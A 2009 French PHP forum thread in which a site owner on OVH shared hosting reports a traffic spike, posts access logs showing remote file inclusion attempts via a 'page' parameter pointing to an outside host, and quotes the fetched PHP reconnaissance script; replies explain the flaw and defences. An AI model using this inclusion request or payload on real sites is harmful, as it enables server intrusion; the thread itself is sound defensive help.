PHPfrance

la communauté d'entraide francophone dédiée au PHP

Site piraté [résolu]

Répondre


Cette question est un moyen d’empêcher des soumissions automatisées de formulaires par des robots.
Smileys
:D :) :( :o :shock: :? 8-) :lol: :x :P :oops: :cry: :evil: :twisted: :roll: :wink: :!: :?: :idea: :arrow: :| :mrgreen: =D> #-o =P~ :^o :non: :priere: 8-|
Voir plus de smileys
  Revue du sujet
 

  Étendre la vue Revue du sujet : Site piraté [résolu]

par fhardi » 07 mars 2009, 11:47

Bonjour,

Pour vous informer au sujet de l'augmentation du traffic de mon site.
En fait ce qui faisait augmenter en flêche le traffic de mon site etait un streaming video sur ma page d'acceuil qui prend beaucoup de bande passante donc de trafic, car dans ma formule 60gp je ne bénéfici pas d'option de streaming...
J'ai fait un petit test ensuite, j'ai rettiré la video sur le serveur de mon site hébergé par ovh en 60GP et je l'ai mis sur le serveur de free pour pouvoir le lire sur la page d'acceuil du site hébergé par ovh, et là le traffic a baisser c'est stabilisé, puis ensuite j'ai refais un test j'ai mis la video sur un autre site à moi en start1g dans je bénfici de 1go de traffic mensuel en moyenne (400mo) et là surprise en moins de 24 heures le traffic à exploser >>>7GO j'ai alluciné, et donc j'ai enlevé la video sur le start1g et remis sur le serveur de free (tres lent en streaming)
Je pense que le probleme venait de là

j'ai été aussi sur le forum http://forum.ovh.com/showthread.php?t=19263 pour avoir quelques instruction sur la sécurité du site hébergé chez ovh, j'ai utiliser quelques .htaccess pour sécurisé mon site, mais y a du travail énorme

SINON je reste sur mes gardes

Merci à vous tous pour vos conseils et interventions

par stopher » 05 mars 2009, 08:45

Re,

J'ai vue qu'avec le 60GP , tu possèdes des outils de stats

http://logs/ovh.net/<ton nom de domaine>

Vois tu des choses intéressantes , ( d'ou viennent les plus gros débits ect .. )

Pour ce qui est de l'administration , etant un serveur mutualisé , ce n'est pas toi qui le gére , tu as bien fait de prévenir l'hébergeur .

Tu as aussi un acces FTP , rien d'anormal de ce coté ?
Pour $_GET et $_POST. je ne crois pas que ses fonctions sont parmis les fichiers que j'utilise
$_GET et $_POST ne sont pas des fonctions , ce sont des paramétres/variables que tu envoie en meme temps que la requete , soit dans l'entete "$_GET" soit dans le corps "$_POST".

Exemple de paramétres GET dans les logs que tu nous as donnés :

Code : Tout sélectionner

page=http://werkzeugweber.de/.../safe1.txt
Nom du paramére : page
Sa valeur : http://werkzeugweber.de/.../safe1.txt

Ici , http://werkzeugweber.de/.../safe1.txt , n'est pas la valeur que tu attends , n'empeche que si tu ne filtres pas ta variable GET ( ici page mais il doit y en avoir d'autres ) on peut charger n'importe quel script distant dans ton code .. apres php est puissant , il permet de faire beaucoup de chose .

Si c'est toi qui a conçu le site , commence par restreindre cette énorme faille tres connu des développeurs mais surtout des "pirates"
Si tu ne veux pas tout modifier , utilise ne serai-ce qu'une vérification par un switch()...case: ce qui te laisse le temps de faire mieux apres !
sinon j'ai vu qu'il ya le site http://www.phpsecure.info/v2/zone/pScript je vais y jeter un coup d'oeil...
Il doit y avoir des choses interessantes , c'est vrai .. mais s'il y a une faille sur ton site , la faille sera toujours là !

Les seules choses qui pouvaient empêcher de tel injections en amont à ma connaissance , sont : un firewall , et mod_security d'apache ( que ce soit l'un ou l'autre tu ne peux pas les mettres en place sans avoir entièrement accès au système ).

Donc , au risque de me répéter , corrige cette faille au plus vite !
Si les logs reviennent à la normal alors victoire , sinon , il va falloir chercher plus loin !

Bonne continuation
Ch.

par fhardi » 05 mars 2009, 00:05

Hi ,

Ce qui m'étonne , c'est qu'un fichier comme celui qu'ils essayent ( et arrivent à premiéres vues ) puissent engendrer un tel augmentation de trafic !!!

[...]

Y a t'il d'autres scripts qui on était "injectés ? "

Ce n'est peut être que la face visible du "pirate" .. est il déjà passé à l'acte ?
As tu des process inconnues qui tournent de façon étrnage ou grourmande ?
Y a t'il eu des tentatives de connexions ( nombreuses ) sur différents services ?

Quels sont les ports ouverts qui ne doivent pas l'être ?
Si tu as des doutes , as tu scanner ton serveur , à la recherche de rootkit / virus / scripts inconnues ?
Ton serveur haberge t'il aussi un sereur de mails si oui verifie les mails expédié voir s'il n'est pas compromis ?
Y a t'il des utilisateurs supplémentaires qui ne devraient pas être là ?

Bref beaucoup de questions pour voir ce qui ne va pas ... ( et une correction rapide de ton site s'impose )!

Et est ce que c'est toi qui administre ton serveur ou un hebergeur ?
En réponse à tes questions, je ne vois rien d'anormal sur mon site, je ne sais pas si il y a des ports ouverts, je ne sais pas comment ça fonctionne les ports sur un site, scanner le serveur non plusd
dans les fichiers logs, ce sont les seuls scripts que j'ai pu trouvé pour le moment
Je suis chez OVH avec 60gp

Est ce que le streaming peut augmenter le traffic d'un site, àa savoir j'ai pas la formule streaming dans le 60gp de OVH ?
Mais je suis persuader que j'ai été hacker, sinon je voudrais connaitre un script php qui me permet de protéger ou sécuriser voir contre le hacking ?

Pour $_GET et $_POST. je ne crois pas que ses fonctions sont parmis les fichiers que j'utilise
Voici ce que j'ai, et c'est assez simple :

un fichier index.php dont j'inclus les fichier suivants : menu_haut.php, menu_bas.php, menu_defaut.php, et le fichier centre.php (inclusion de menu_gauche et menu_left) qui est inclus également dans index.php qui contient les code cités plus haut, voilà ce que j'ai

sinon j'ai vu qu'il ya le site http://www.phpsecure.info/v2/zone/pScript je vais y jeter un coup d'oeil...

Si vous avez des suggections n'hésitez pas, et comme mon hébergeur a été informer du piratage je suis en attente de réponses...

je vous tiens informer

Cdt

par Berzemus » 04 mars 2009, 14:00

Comme le dit Stopher, il se peut aussi que ton site sert à diffuser des données, genre reseau P2P, parce qu'un tel traffic, c'est quand même louche.

Tu n'a pas une page de statistiques (style awstats) ou tu pourrais voir en un coup d'oeil le type de traffic qu'encaisse ton site ?

Pour le code, il faudrait voir le morceau exact ou sont traités les variables $_GET et $_POST.

par stopher » 04 mars 2009, 13:40

Hi ,

Ce qui m'étonne , c'est qu'un fichier comme celui qu'ils essayent ( et arrivent à premiéres vues ) puissent engendrer un tel augmentation de trafic !!!

Car le script : 
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
Tend à mettre à nue ton serveur , pour y afficher un maximum d'informations pour une attaque ultérieur .

Y a t'il d'autres scripts qui on était "injectés ? "

Ce n'est peut être que la face visible du "pirate" .. est il déjà passé à l'acte ?
As tu des process inconnues qui tournent de façon étrnage ou grourmande ?
Y a t'il eu des tentatives de connexions ( nombreuses ) sur différents services ?

Quels sont les ports ouverts qui ne doivent pas l'être ?
Si tu as des doutes , as tu scanner ton serveur , à la recherche de rootkit / virus / scripts inconnues ?
Ton serveur haberge t'il aussi un sereur de mails si oui verifie les mails expédié voir s'il n'est pas compromis ?
Y a t'il des utilisateurs supplémentaires qui ne devraient pas être là ?

Bref beaucoup de questions pour voir ce qui ne va pas ... ( et une correction rapide de ton site s'impose )!

Et est ce que c'est toi qui administre ton serveur ou un hebergeur ?

par fhardi » 04 mars 2009, 12:29

Commencons par tes variables POST et GET. Comment tu les récupères, et comment tu les filtres ?

Parce que ça:

Code : Tout sélectionner

index.php?page=acceuil.php
C'est atroce. C'est un peu comme dire n'avoir jamais compris qu'il fallait soulever l'abattant du Wc avant de l'utiliser.

Ce n'est pas méchant du tout, c'est juste pour démontre un niveau inconsidéré (et dangereux) d'inaptitude en programmation web. :wink:
merci pour ta réponse, sinon voilà ce que j'ai dans un fichier qui me permet de récupérer, le fichier centre.php :
<div align="center">
<table width="915" border="0" cellpadding="0" cellspacing="0">
  <tr> 
      <td width="16%" height="20%" valign="top"> 
        <? include('menu_left.php'); ?>      </td>
      <td valign="top" height="10%" width="67%"> 
        
        <div align="center">
          <?
// Menu 1
if($page=="defaut"){ include("defaut.php");} 
elseif ($page=="lien2"){ include("menu1/lien2.php");} 
elseif ($page=="lien3"){ include("menu1/lien3.php");} 

// Page Defaut
else {include('defaut.php');} // Sinon la page defaut.php s'affiche
?></div></td>
      <td valign="top" height="20%" width="17%"> 
        <div align="right">
          <? include('menudroit.php'); ?>
        </div></td>
  </tr>
</table>

</div>
[/php]

Je ne suis pas un as de la prog, j'apprend petit à petit

Merci pour ta réponse

par Berzemus » 04 mars 2009, 12:14

Commencons par tes variables POST et GET. Comment tu les récupères, et comment tu les filtres ?

Parce que ça:

Code : Tout sélectionner

index.php?page=acceuil.php
C'est atroce. C'est un peu comme dire n'avoir jamais compris qu'il fallait soulever l'abattant du Wc avant de l'utiliser.

Ce n'est pas méchant du tout, c'est juste pour démontre un niveau inconsidéré (et dangereux) d'inaptitude en programmation web. :wink:

Site piraté [résolu]

par fhardi » 04 mars 2009, 11:36

Bonjour,

Je ne sais pa quoi mettre dans le titre, donc j'ai mis "Site piraté"
Je vous explique mon probleme, voilà j'ai prix comme hebergeur chez OVG ça fait 3 semaines 60GP, en moyenne 350 visiteurs/jours, 2 Go de trafic journalier jusqu'au 01/03/2009, je regarde régulierement le traffic de mon site (2go/J), à la date du 2 Mars j'etais à 3 Go pour le mois de mars, je regarde de nouveaux mon traffic et il m'indique que je suis à 26 Go (mardi), et aujourd'hui je reçois un mail du service technique me disant que j'ai dépasser mes 40GO (à la base 20go, j'ai du rajouter 20go suppl, car j'allais dépasser pour le mois de Fev 18/20go), actuellement j'ai un trafic de 56Go, ce qui est anormal, je répond au support technique OVH, en leur expliquant, ensuite qui me repond de suite me disant de regarder sur le fichier .log et de me dire si j'ai pas été piraté (il me dise que des personnes peuvent piratés un site et effectué des requêtes, ce qui explique l'augmentation du traffic), alors je consulte bien le fichier .log et je remarque des intrus (bizarre)
J'ai ceci comme log :

Code : Tout sélectionner

gate.xl.pt www.******.fr - [04/Mar/2009:05:42:29 +0100] "GET /index.php?page=download_adhan/index.php?page=http://werkzeugweber.de/.../safe1.txt? HTTP/1.1" 200 129400 "-" "libwww-perl/5.79" ------------------------------------------------------------ gate.xl.pt www.******.fr - [04/Mar/2009:05:42:30 +0100] "GET /index.php?page=http://werkzeugweber.de/.../safe1.txt? HTTP/1.1" 200 129612 "-" "libwww-perl/5.79" ------------------------------------------------------------- gate.xl.pt www.******.fr - [04/Mar/2009:08:46:29 +0100] "GET /index.php?page=http://werkzeugweber.de/.../safe1.txt? HTTP/1.1" 200 129382 "-" "libwww-perl/5.79" -----------------------------------------------------------------
Mon site est en pseudo frame comme ceci : http://www.*******.fr/index.php?page=acceuil.php et quand je vais sur http://werkzeugweber.de/.../safe1.txt? , voilà ce qui me met :
<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
?>
Est ce que j'ai été piraté selon vous , ce qui fait que mon traffic augmente ?

Sinon connaissez vous du code PHP pour bien sécurisé les peudos frames ou tout simplement un site ?

Merci vous vos réponse

Cdt